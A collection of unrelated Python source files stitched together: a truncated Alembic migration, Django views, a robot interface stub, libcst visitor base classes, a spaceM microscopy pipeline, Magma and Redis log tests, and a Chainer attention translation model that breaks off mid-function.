sa.ForeignKeyConstraint(["role"], ["auth_role.id"], name="role_fk"),
sa.ForeignKeyConstraint(
["user"],
["app_1_base_user.id"],
),
sa.ForeignKeyConstraint(["user"], ["app_1_base_user.id"], name="user_fk"),
sa.PrimaryKeyConstraint("user", "role"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("auth_user_role")
op.drop_table("auth_role_permission")
op.drop_table("app_1_comics")
op.drop_table("auth_role")
op.drop_table("auth_permission")
op.drop_table("app_2_base_user")
op.drop_table("app_1_custom_user")
op.drop_table("app_1_book")
op.drop_table("app_1_base_user")
# ### end Alembic commands ###
|
py | b415bbb504f0f28a3a828214150403473fbba381 | from django.utils.translation import ugettext_lazy as _
from ..accounts.models import UserProfile
from oauth2_provider.models import get_application_model
from django.views.generic.base import TemplateView
from django.shortcuts import redirect
from django.contrib.auth.mixins import LoginRequiredMixin
Application = get_application_model()
class HomeView(TemplateView):
template_name = "index.html"
def get(self, request, *args, **kwargs):
if request.user.is_authenticated:
return redirect('/home')
return super().get(request, *args, **kwargs)
class AuthenticatedHomeView(LoginRequiredMixin, TemplateView):
template_name = 'authenticated-home.html'
def get_context_data(self, **kwargs):
request = self.request
name = _('Authenticated Home')
try:
profile = UserProfile.objects.get(user=request.user)
except UserProfile.DoesNotExist:
profile = None
# this is a GET
context = {
'name': name,
'profile': profile,
'applications': Application.objects.filter(user=request.user),
}
return context
|
py | b415bc8c37a5069d7a9a2f6b90f16f0b6401e908 | import utilities as util
# modules for interfacing with robot control and FT sensor
# from robot_control_interface import ControlInterface
# from ft_sensor_interface import FTInterface
class RobotRealExample():
def __init__(self):
# Connect the interfaces
self.robot_interface = ControlInterface()
self.ft_interface = FTInterface()
@staticmethod
def decompose_incoming_pose_data(data):
position = data[:3]
rotation = data[3:7]
return [position, rotation]
def get_member_pose(self):
self.robot_interface.receive()
data_in = self.robot_interface.message_in.values
values = self.decompose_incoming_pose_data(data_in)
position_m = values[0]
rotation_quat = values[1]
return [position_m, rotation_quat]
@staticmethod
def get_target_pose():
# target at world origin
return [0, 0, 0], util.xyzw_by_euler([0, 0, 0], 'sxyz')
def get_force_torque(self):
self.ft_interface.receive()
data_in = self.ft_interface.message_in.values
force_torque = data_in
return force_torque
def apply_action_pose(self, delta, done):
relative_pos = delta[0:3]
relative_orn = delta[3:6]
data_out = list(relative_pos) + list(relative_orn) + [done]
self.robot_interface.send(data_out)
def apply_action_position(self, delta, done):
data_out = list(delta) + [0, 0, 0] + [done]
self.robot_interface.send(data_out)
|
py | b415bcadbc9f8dead58a5f9ee161559dc9782953 |
from django.urls import path,include
from . import views
urlpatterns = [
path('',views.home,name="home_page")
] |
py | b415bd13205b158cee6eb9320c518ce40a326667 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from typing import TYPE_CHECKING, Union
from libcst._metadata_dependent import MetadataDependent
from libcst._removal_sentinel import RemovalSentinel
from libcst._typed_visitor import CSTTypedTransformerFunctions, CSTTypedVisitorFunctions
from libcst._types import CSTNodeT
if TYPE_CHECKING:
# Circular dependency for typing reasons only
from libcst._nodes.base import CSTNode # noqa: F401
CSTVisitorT = Union["CSTTransformer", "CSTVisitor"]
class CSTTransformer(CSTTypedTransformerFunctions, MetadataDependent):
"""
The low-level base visitor class for traversing a CST and creating an
updated copy of the original CST. This should be used in conjunction with
the :func:`~libcst.CSTNode.visit` method on a :class:`~libcst.CSTNode` to
visit each element in a tree starting with that node, and possibly returning
a new node in its place.
When visiting nodes using a :class:`CSTTransformer`, the return value of
:func:`~libcst.CSTNode.visit` will be a new tree with any changes made in
:func:`~libcst.CSTTransformer.on_leave` calls reflected in its children.
"""
def on_visit(self, node: "CSTNode") -> bool:
"""
Called every time a node is visited, before we've visited its children.
Returns ``True`` if children should be visited, and returns ``False``
otherwise.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}", None)
if visit_func is not None:
retval = visit_func(node)
else:
retval = True
# Don't visit children IFF the visit function returned False.
return False if retval is False else True
def on_leave(
self, original_node: CSTNodeT, updated_node: CSTNodeT
) -> Union[CSTNodeT, RemovalSentinel]:
"""
Called every time we leave a node, after we've visited its children. If
the :func:`~libcst.CSTTransformer.on_visit` function for this node returns
``False``, this function will still be called on that node.
``original_node`` is guaranteed to be the same node as is passed to
:func:`~libcst.CSTTransformer.on_visit`, so it is safe to do state-based
checks using the ``is`` operator. Modifications should always be performed
on the ``updated_node`` so as to not overwrite changes made by child
visits.
Returning :attr:`RemovalSentinel.REMOVE` indicates that the node should be
removed from its parent. This is not always possible, and may raise an
exception if this node is required. As a convenience, you can use
:func:`RemoveFromParent` as an alias to :attr:`RemovalSentinel.REMOVE`.
"""
leave_func = getattr(self, f"leave_{type(original_node).__name__}", None)
if leave_func is not None:
updated_node = leave_func(original_node, updated_node)
return updated_node
def on_visit_attribute(self, node: "CSTNode", attribute: str) -> None:
"""
Called before a node's child attribute is visited and after we have called
:func:`~libcst.CSTTransformer.on_visit` on the node. A node's child
attributes are visited in the order that they appear in source that this
node originates from.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}_{attribute}", None)
if visit_func is not None:
visit_func(node)
def on_leave_attribute(self, original_node: "CSTNode", attribute: str) -> None:
"""
Called after a node's child attribute is visited and before we have called
:func:`~libcst.CSTTransformer.on_leave` on the node.
Unlike :func:`~libcst.CSTTransformer.on_leave`, this function does
not allow modifications to the tree and is provided solely for state
management.
"""
leave_func = getattr(
self, f"leave_{type(original_node).__name__}_{attribute}", None
)
if leave_func is not None:
leave_func(original_node)
class CSTVisitor(CSTTypedVisitorFunctions, MetadataDependent):
"""
The low-level base visitor class for traversing a CST. This should be used in
conjunction with the :func:`~libcst.CSTNode.visit` method on a
:class:`~libcst.CSTNode` to visit each element in a tree starting with that
node. Unlike :class:`CSTTransformer`, instances of this class cannot modify
the tree.
When visiting nodes using a :class:`CSTVisitor`, the return value of
:func:`~libcst.CSTNode.visit` will equal the passed in tree.
"""
def on_visit(self, node: "CSTNode") -> bool:
"""
Called every time a node is visited, before we've visited its children.
Returns ``True`` if children should be visited, and returns ``False``
otherwise.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}", None)
if visit_func is not None:
retval = visit_func(node)
else:
retval = True
# Don't visit children IFF the visit function returned False.
return False if retval is False else True
def on_leave(self, original_node: "CSTNode") -> None:
"""
Called every time we leave a node, after we've visited its children. If
the :func:`~libcst.CSTVisitor.on_visit` function for this node returns
``False``, this function will still be called on that node.
"""
leave_func = getattr(self, f"leave_{type(original_node).__name__}", None)
if leave_func is not None:
leave_func(original_node)
def on_visit_attribute(self, node: "CSTNode", attribute: str) -> None:
"""
Called before a node's child attribute is visited and after we have called
:func:`~libcst.CSTTransformer.on_visit` on the node. A node's child
attributes are visited in the order that they appear in source that this
node originates from.
"""
visit_func = getattr(self, f"visit_{type(node).__name__}_{attribute}", None)
if visit_func is not None:
visit_func(node)
def on_leave_attribute(self, original_node: "CSTNode", attribute: str) -> None:
"""
Called after a node's child attribute is visited and before we have called
:func:`~libcst.CSTVisitor.on_leave` on the node.
"""
leave_func = getattr(
self, f"leave_{type(original_node).__name__}_{attribute}", None
)
if leave_func is not None:
leave_func(original_node)
|
py | b415be027f780c0cec1b6b4dc3a0826d0d820680 | import spaceM
import pandas as pd
import os, gc
from subprocess import call
import GUI_maldi_helper
def getPath(field):
return pd.read_json(os.path.dirname(spaceM.__file__) + '\\paths.json')[field].values[0]
def curator(load_path, plot_title):
os.rename(load_path, load_path.split('.')[0] + '_old.' + load_path.split('.')[1])
call(['python', os.path.dirname(GUI_maldi_helper.__file__) + '\\MaldiHelper.py',
load_path.split('.')[0] + '_old.' + load_path.split('.')[1],
load_path,
plot_title])
def stitchMicroscopy(MF,
merge_colors,
merge_filenames,
tf,
preMALDI=True,
postMALDI=True,
):
"""Function to stitch tile microscopy images into a single one. The function first applies a transformation (tf) on
each tile images prior to stitching. It also merges defined fields of stitched images together into an RGB .png
file.
Args:
MF (str): path to the Main Folder.
merge_colors (list): list of string of color names: 'red', 'green', 'blue', 'gray', 'cyan', 'magenta', 'yellow'.
merge_filenames (list): list of string of image files names to merge. Their sequence in the list should match their
respective color in the 'colors' argument. After stitching they should start with 'img_t1_z1_c ... '.
tf (fun): image transformation to apply to the tile images prior to stitching.
preMALDI (bool): whether or not stithcing preMALDI dataset.
postMALDI (bool): whether or not stithcing postMALDI dataset.
Data are stored in MF + /Analysis/StitchedMicroscopy/
"""
if not os.path.exists(MF + 'Analysis/'):
os.makedirs(MF + 'Analysis/')
os.mkdir(MF + 'Analysis/StitchedMicroscopy/')
if preMALDI:
if not os.path.exists(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/'):
os.makedirs(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
tif_files = spaceM.ImageFileManipulation.manipulations.PixFliplr(
tf,
MF + 'Input/Microscopy/preMALDI/',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.TileConfFormat(path= MF + 'Input/Microscopy/preMALDI/',
dir_fliplr=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
tif_files=tif_files)
gc.collect()
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch_noCompute(dir_in=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/' + 'other_channels/',
dir_out=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
print('Pre-MALDI Stitching finished')
if postMALDI:
if not os.path.exists(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/'):
os.makedirs(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
tif_files = spaceM.ImageFileManipulation.manipulations.PixFliplr(
tf,
MF + 'Input/Microscopy/postMALDI/',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.TileConfFormat(path=MF + 'Input/Microscopy/postMALDI/',
dir_fliplr=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/',
tif_files=tif_files)
gc.collect()
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
try:
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch_noCompute(dir_in=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/' + 'other_channels/',
dir_out=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
except FileNotFoundError:
print('Only one channel in postMALDI')
print('Pre-MALDI Stitching finished')
if merge_colors != []:
spaceM.ImageFileManipulation.FIJIcalls.callFIJImergeChannels(
base_path=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
colors=merge_colors,
filenames=merge_filenames,
save_filename='Composite.png')
def ablationMarksFinder_old(MF):
"""Find the ablation marks on the tile images.
Args:
MF (str): path to the Main Folder.
Data are stored in MF + /Analysis/gridFit/
"""
if not os.path.exists(MF + 'Analysis/gridFit/'):
os.makedirs(MF + 'Analysis/gridFit/')
spaceM.Registration.AblationMarkFinder.MarkFinderFT(MF)
def ablationMarks_crop(MF, im_name='img_t2_z1_c1'):
if not os.path.exists(MF + 'Analysis/gridFit/'):
os.makedirs(MF + 'Analysis/gridFit/')
call(['python', os.path.dirname(GUI_maldi_helper.__file__) + '\\MaldiHelper.py',
MF + 'Analysis\\StitchedMicroscopy\\postMALDI_FLR\\{}'.format(im_name),
MF + 'Analysis\\gridFit\\AM_cropped.tif',
'Select AM, crop, save, close'])
# def ablationMarksFinder_new(MF):
#
# spaceM.Registration.AblationMarkFinder.MarkFinderFT(MF)
def ablationMarksFilter(MF, crop_2ndImg=True, im_crop_source='img_t1_z1_c1', marks_check=True, matrix='DAN'):
"""Filters ablation marks. First by re-running the ablation mark detection on the cropped stitched images where the
ablation marks are. Then by fitting a theoretical grid on the detections and taking only teh closest detection to
each grid node. This filters out double detections and re-orders the remaning ones into a uniform index which matches
later on the index of the ion image. The detections after filtering can be visualized in 'ili (https://ili.embl.de/).
Args:
MF (str): path to the Main Folder.
marks_check (bool): whether or not show the results.
Data are stored in MF + /Analysis/gridFit/
Visualization are stored in MF + /Analysis/gridFit/marks_check/
"""
if crop_2ndImg:
spaceM.Registration.AblationMarkFinder.crop_img(MF, im_p=MF+'Analysis/StitchedMicroscopy/postMALDI_FLR/{}'.format(im_crop_source),
coords_p=MF+'Analysis/gridFit/AM_cropped_coords.npy')
spaceM.Registration.AblationMarkFinder.GridFit(MF, matrix=matrix)
if marks_check:
if not os.path.exists(MF + 'Analysis/gridFit/marks_check/'):
os.makedirs(MF + 'Analysis/gridFit/marks_check/')
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t1_z1_c0',
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1_window100.tiff',
window=100)
if matrix == 'DHB':
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t2_z1_c1',
MF + 'Analysis/gridFit/marks_check/Fluo_crop_bin1x1_window100.tiff',
window=100)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t1_z1_c0',
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1.png',
window=0)
nbin = spaceM.ImageFileManipulation.FIJIcalls.imbin4ili(
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1.png',
maxsize=50e6)
predata = spaceM.WriteILIinput.preCSVdatagen(
MF + 'Analysis/gridFit/xye_clean2.npy',
radius=10,
nbin=nbin,
PlainFirst=True)
spaceM.WriteILIinput.writeCSV(
path=MF + 'Analysis/gridFit/marks_check/ablation_marks_checkDETECTIONS.csv',
data=predata)
predata = spaceM.WriteILIinput.preCSVdatagen(
MF + 'Analysis/gridFit/xye_grid.npy',
radius=10,
nbin=nbin,
PlainFirst=True)
spaceM.WriteILIinput.writeCSV(
path=MF + 'Analysis/gridFit/marks_check/ablation_marks_checkTHEORETICAL.csv',
data=predata)
if not os.path.exists(MF + 'Analysis/gridFit/marksMask.npy'):
spaceM.Registration.AblationMarkFinder.regionGrowingAblationMarks(MF,
grow_thresh=0.60,
blur=False,
sigma=2,
matrix='DAN',
refine_seed=True,
FT_filtered=False,
maxDist=20) # blur=True and grow_thresh=0.25 for DAN
spaceM.Registration.AblationMarkFinder.AM_filter(MF, n_std=4)
def fiducialsFinder(MF):
"""Find the fiducials coordinates on the stitched images.
Args:
MF (str): path to the Main Folder.
Data are stored in MF + /Analysis/Fiducials/
"""
if not os.path.exists(MF + 'Analysis/Fiducials/'):
os.makedirs(MF + 'Analysis/Fiducials/')
spaceM.Registration.ImageRegistration.penMarksFeatures(MF, prefix='post')
spaceM.Registration.ImageRegistration.penMarksFeatures(MF, prefix='pre')
def registration(MF, tf_obj='dummy', do_transform=True, do_ili=True, ili_fdr=0.1):
if not os.path.exists(MF + 'Analysis/Fiducials/optimized_params.npy'):
spaceM.Registration.ImageRegistration.fiducialsAlignment(MF,
src=MF+'Analysis/Fiducials/postXYpenmarks.npy',
dst=MF+'Analysis/Fiducials/preXYpenmarks.npy')
if do_transform:
spaceM.Registration.ImageRegistration.TransformMarks(MF)
if do_ili:
if not os.path.exists(MF + 'Analysis/ili/'):
os.makedirs(MF + 'Analysis/ili/')
if not os.path.exists(MF + 'Analysis/ili/FLUO_crop_bin1x1.png'):
spaceM.ImageFileManipulation.manipulations.crop2coords(
coords_p=MF + 'Analysis/Fiducials/transformedMarks.npy',
img_p=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
save_p=MF + 'Analysis/ili/FLUO_crop_bin1x1.png',
window=0)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
MF + 'Analysis/ili/FLUO_crop_bin1x1_window100.png',
window=100)
gc.collect()
nbin = spaceM.ImageFileManipulation.FIJIcalls.imbin4ili(MF + 'Analysis/ili/FLUO_crop_bin1x1.png', maxsize=50e6)
spaceM.WriteILIinput.annotationSM2CSV(
MFA=MF + 'Analysis/',
MFI=MF + 'Input/',
fdr=ili_fdr,
nbin=nbin,
radius=20,
tf_obj=tf_obj,
db='HMDB-v4')
def cellSegmentation(MF,
merge_colors,
merge_filenames,
prepCP_fun):
if not os.path.exists(MF + 'Analysis/CellProfilerAnalysis/'):
os.makedirs(MF + 'Analysis/CellProfilerAnalysis/')
CP_window = 100
spaceM.ImageFileManipulation.manipulations.crop2coords4CP(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
MF + 'Analysis/CellProfilerAnalysis/',
window=CP_window)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
MF + 'Analysis/CellProfilerAnalysis/Composite_window100_adjusted.png',
window=CP_window)
gc.collect()
prepCP_fun(MF)
print('Start CellProfiler Anlalysis')
cp_p = getPath('CellProfiler path')
cppipe_p = getPath('CellProfiler pipeline path')
spaceM.scAnalysis.Segmentation.callCP(MF + 'Analysis/', cp_p, cppipe_p)
print('Finished CellProfiler Anlalysis')
CP_window = 100
spaceM.scAnalysis.Segmentation.cellOutlines_fast(MF + 'Analysis/CellProfilerAnalysis/Composite_window100_adjusted.png',
CP_window,
MF + 'Analysis/CellProfilerAnalysis/Labelled_cells.tiff',
MF + 'Analysis/CellProfilerAnalysis/Contour_cells_adjusted.png')
def spatioMolecularMatrix(MF, tf_obj, CDs=[2], fetch_ann = 'online', filter = 'correlation', tol_fact = -0.2, hdf5_path='dummy'):
if not os.path.exists(MF + 'Analysis/scAnalysis/'):
os.makedirs(MF + 'Analysis/scAnalysis/')
# spaceM.scAnalysis.scAnalysis.defMORPHfeatures(MF)
# fetch_ann = 'online' # either 'online' or 'offline'
# either 'mean' or 'correlation'
spaceM.scAnalysis.scAnalysis_refactored.defMOLfeatures(
MF,
tf_obj=tf_obj,
CDs=CDs,
norm_method='weighted_mean_sampling_area_MarkCell_overlap_ratio_sampling_area',
fetch_ann=fetch_ann, tol_fact=tol_fact, filter=filter, hdf5_path=hdf5_path)
spaceM.scAnalysis.scAnalysis_refactored.mergeMORPHnMOL(
MF,
CDs=CDs,
fetch_ann=fetch_ann,
tol_fact=tol_fact,
filter=filter) |
py | b415befe8c5aec085e5d7d1a4c5cebefb0dab9f9 | default_app_config = 'mayan.apps.document_signatures.apps.DocumentSignaturesApp'
|
py | b415c0b3f03dc493fa9de3af0756024851aac761 | """
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=protected-access
from unittest import TestCase
from magma.enodebd.devices.device_utils import (
EnodebDeviceName,
_parse_sw_version,
get_device_name,
)
from magma.enodebd.exceptions import UnrecognizedEnodebError
class EnodebConfigUtilsTest(TestCase):
def test_get_device_name(self) -> None:
# Baicells
oui = '34ED0B'
version = 'BaiStation_V100R001C00B110SPC003'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS
self.assertEqual(data_model, expected, 'Incorrect data model')
# Baicells before bug-fix
oui = '34ED0B'
version = 'BaiStation_V100R001C00B110SPC002'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS_OLD
self.assertEqual(data_model, expected, 'Incorrect data model')
# Baicells QAFB
oui = '48BF74'
version = 'BaiBS_QAFB_some_version'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS_QAFB
self.assertEqual(data_model, expected, 'Incorrect data model')
# Cavium
oui = '000FB7'
version = 'Some version of Cavium'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.CAVIUM
self.assertEqual(data_model, expected, 'Incorrect data model')
# Unsupported device OUI
oui = 'beepboopbeep'
version = 'boopboopboop'
with self.assertRaises(UnrecognizedEnodebError):
get_device_name(oui, version)
# Unsupported software version for Baicells
oui = '34ED0B'
version = 'blingblangblong'
with self.assertRaises(UnrecognizedEnodebError):
get_device_name(oui, version)
def test_parse_version(self):
""" Test that version string is parsed correctly """
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B110SPC003'),
[100, 1, 0, 110, 3],
)
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B060SPC012'),
[100, 1, 0, 60, 12],
)
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B060SPC012_FB_3'),
[100, 1, 0, 60, 12],
)
# Incorrect number of digits
self.assertEqual(
_parse_sw_version('BaiStation_V10R001C00B060SPC012'),
None,
)
self.assertEqual(
_parse_sw_version('XYZ123'),
None,
)
self.assertEqual(
_parse_sw_version(''),
None,
)
|
py | b415c2278b5d8da6407802f9254761535d647bad | c = 0
while c <= 100:
print(c)
c += 1 |
py | b415c2fae5de7d3456d8ab73c7a93bc889a705da | from __future__ import absolute_import, division, print_function
import json
import os
import time
from threading import Thread
from unittest import TestCase
from manhattan.log.remote import make_redis, server, RemoteLog, RemoteLogServer
from manhattan.log.timerotating import TimeRotatingLog
REDIS_KEY = 'manhattan:testing:log:queue'
class ServerThread(Thread):
def __init__(self, log_server):
self.log_server = log_server
super(ServerThread, self).__init__()
def run(self):
self.log_server.run()
class TestRemoteLog(TestCase):
@classmethod
def setUpClass(cls):
cls.text_log = TimeRotatingLog('/tmp/manhattan-tests/remote.log')
cls.log = RemoteLog(key=REDIS_KEY)
for f in cls._get_log_files():
os.remove(f)
cls.log.db.delete(REDIS_KEY)
@classmethod
def _get_log_files(cls):
files = []
dirname = os.path.dirname(cls.text_log.path)
for f in os.listdir(dirname):
if f.startswith('remote.log'):
files.append(os.path.join(dirname, f))
return files
def test_01_enqueue(self):
record = ['a', 'b', 'c']
self.log.write(record)
item = self.log.db.lpop(REDIS_KEY)
stored_record = json.loads(item)[0]
self.assertEqual(stored_record, record)
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
def test_02_consume(self):
log_server = RemoteLogServer(self.text_log, key=REDIS_KEY)
log_server_thread = ServerThread(log_server)
self.log.write(['a', 'b', 'c'])
self.log.write(['x', 'y', 'z'])
log_server_thread.start()
self.log.write(['1', '2', '3'])
time.sleep(0.5)
log_file = self._get_log_files()[0]
with open(log_file) as fp:
lines = fp.readlines()
self.assertEqual(len(lines), 3)
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
self.log.send_command('STOP')
def test_server_script(self):
"""Create and immediately stop server."""
self.log.send_command('STOP')
server(['--key', REDIS_KEY])
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
def test_make_redis(self):
redis = make_redis({'socket_timeout': 1}, socket_timeout=2)
connection = redis.connection_pool.make_connection()
self.assertEqual(connection.socket_timeout, 1)
redis.rpush(REDIS_KEY, 'a')
self.assertEqual(redis.lpop(REDIS_KEY), 'a')
self.assertEqual(redis.llen(REDIS_KEY), 0)
|
py | b415c2ff865d9d9a45e219ac44178993d95958e3 | #!/usr/bin/python3
import my_settings
import sys
import math
import numpy as np
from argparse import ArgumentParser
from chainer import functions, optimizers
import chainer.computational_graph as cg
import util.generators as gens
from util.functions import trace, fill_batch2
from util.model_file import ModelFile
from util.vocabulary import Vocabulary
#from util.chainer_cpu_wrapper import wrapper
from util.chainer_gpu_wrapper import wrapper
class AttentionalTranslationModel:
def __init__(self):
pass
def __make_model(self):
self.__model = wrapper.make_model(
# input embedding
w_xi = functions.EmbedID(len(self.__src_vocab), self.__n_embed),
# forward encoder
w_ia = functions.Linear(self.__n_embed, 4 * self.__n_hidden),
w_aa = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
# backward encoder
w_ib = functions.Linear(self.__n_embed, 4 * self.__n_hidden),
w_bb = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
# attentional weight estimator
w_aw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_bw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_pw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_we = functions.Linear(self.__n_hidden, 1),
# decoder
w_ap = functions.Linear(self.__n_hidden, self.__n_hidden),
w_bp = functions.Linear(self.__n_hidden, self.__n_hidden),
w_yp = functions.EmbedID(len(self.__trg_vocab), 4 * self.__n_hidden),
w_pp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_cp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_dp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_py = functions.Linear(self.__n_hidden, len(self.__trg_vocab)),
)
@staticmethod
def new(src_vocab, trg_vocab, n_embed, n_hidden):
self = AttentionalTranslationModel()
self.__src_vocab = src_vocab
self.__trg_vocab = trg_vocab
self.__n_embed = n_embed
self.__n_hidden = n_hidden
self.__make_model()
return self
def save(self, filename):
with ModelFile(filename, 'w') as fp:
self.__src_vocab.save(fp.get_file_pointer())
self.__trg_vocab.save(fp.get_file_pointer())
fp.write(self.__n_embed)
fp.write(self.__n_hidden)
wrapper.begin_model_access(self.__model)
fp.write_embed(self.__model.w_xi)
fp.write_linear(self.__model.w_ia)
fp.write_linear(self.__model.w_aa)
fp.write_linear(self.__model.w_ib)
fp.write_linear(self.__model.w_bb)
fp.write_linear(self.__model.w_aw)
fp.write_linear(self.__model.w_bw)
fp.write_linear(self.__model.w_pw)
fp.write_linear(self.__model.w_we)
fp.write_linear(self.__model.w_ap)
fp.write_linear(self.__model.w_bp)
fp.write_embed(self.__model.w_yp)
fp.write_linear(self.__model.w_pp)
fp.write_linear(self.__model.w_cp)
fp.write_linear(self.__model.w_dp)
fp.write_linear(self.__model.w_py)
wrapper.end_model_access(self.__model)
@staticmethod
def load(filename):
self = AttentionalTranslationModel()
with ModelFile(filename) as fp:
self.__src_vocab = Vocabulary.load(fp.get_file_pointer())
self.__trg_vocab = Vocabulary.load(fp.get_file_pointer())
self.__n_embed = int(fp.read())
self.__n_hidden = int(fp.read())
self.__make_model()
wrapper.begin_model_access(self.__model)
fp.read_embed(self.__model.w_xi)
fp.read_linear(self.__model.w_ia)
fp.read_linear(self.__model.w_aa)
fp.read_linear(self.__model.w_ib)
fp.read_linear(self.__model.w_bb)
fp.read_linear(self.__model.w_aw)
fp.read_linear(self.__model.w_bw)
fp.read_linear(self.__model.w_pw)
fp.read_linear(self.__model.w_we)
fp.read_linear(self.__model.w_ap)
fp.read_linear(self.__model.w_bp)
fp.read_embed(self.__model.w_yp)
fp.read_linear(self.__model.w_pp)
fp.read_linear(self.__model.w_cp)
fp.read_linear(self.__model.w_dp)
fp.read_linear(self.__model.w_py)
wrapper.end_model_access(self.__model)
return self
def init_optimizer(self):
self.__opt = optimizers.AdaGrad(lr=0.01)
self.__opt.setup(self.__model)
def __forward(self, is_training, src_batch, trg_batch = None, generation_limit = None):
m = self.__model
tanh = functions.tanh
lstm = functions.lstm
batch_size = len(src_batch)
hidden_size = self.__n_hidden
src_len = len(src_batch[0])
trg_len = len(trg_batch[0]) - 1 if is_training else generation_limit
src_stoi = self.__src_vocab.stoi
trg_stoi = self.__trg_vocab.stoi
trg_itos = self.__trg_vocab.itos
hidden_zeros = wrapper.zeros((batch_size, hidden_size))
sum_e_zeros = wrapper.zeros((batch_size, 1))
# make embedding
list_x = []
for l in range(src_len):
s_x = wrapper.make_var([src_stoi(src_batch[k][l]) for k in range(batch_size)], dtype=np.int32)
list_x.append(s_x)
# forward encoding
c = hidden_zeros
s_a = hidden_zeros
list_a = []
for l in range(src_len):
s_x = list_x[l]
s_i = tanh(m.w_xi(s_x))
c, s_a = lstm(c, m.w_ia(s_i) + m.w_aa(s_a))
list_a.append(s_a)
# backward encoding
c = hidden_zeros
s_b = hidden_zeros
list_b = []
for l in reversed(range(src_len)):
s_x = list_x[l]
s_i = tanh(m.w_xi(s_x))
c, s_b = lstm(c, m.w_ib(s_i) + m.w_bb(s_b))
list_b.insert(0, s_b)
# decoding
c = hidden_zeros
s_p = tanh(m.w_ap(list_a[-1]) + m.w_bp(list_b[0]))
s_y = wrapper.make_var([trg_stoi('<s>') for k in range(batch_size)], dtype=np.int32)
hyp_batch = [[] for _ in range(batch_size)]
accum_loss = wrapper.zeros(()) if is_training else None
#for n in range(src_len):
# print(src_batch[0][n], end=' ')
#print()
for l in range(trg_len):
# calculate attention weights
list_e = []
sum_e = sum_e_zeros
for n in range(src_len):
s_w = tanh(m.w_aw(list_a[n]) + m.w_bw(list_b[n]) + m.w_pw(s_p))
r_e = functions.exp(m.w_we(s_w))
#list_e.append(functions.concat(r_e for _ in range(self.__n_hidden)))
list_e.append(r_e)
sum_e += r_e
#sum_e = functions.concat(sum_e for _ in range(self.__n_hidden))
# make attention vector
s_c = hidden_zeros
s_d = hidden_zeros
for n in range(src_len):
s_e = list_e[n] / sum_e
#s_c += s_e * list_a[n]
#s_d += s_e * list_b[n]
s_c += functions.reshape(functions.batch_matmul(list_a[n], s_e), (batch_size, hidden_size))
s_d += functions.reshape(functions.batch_matmul(list_b[n], s_e), (batch_size, hidden_size))
#zxcv = wrapper.get_data(s_e)[0][0]
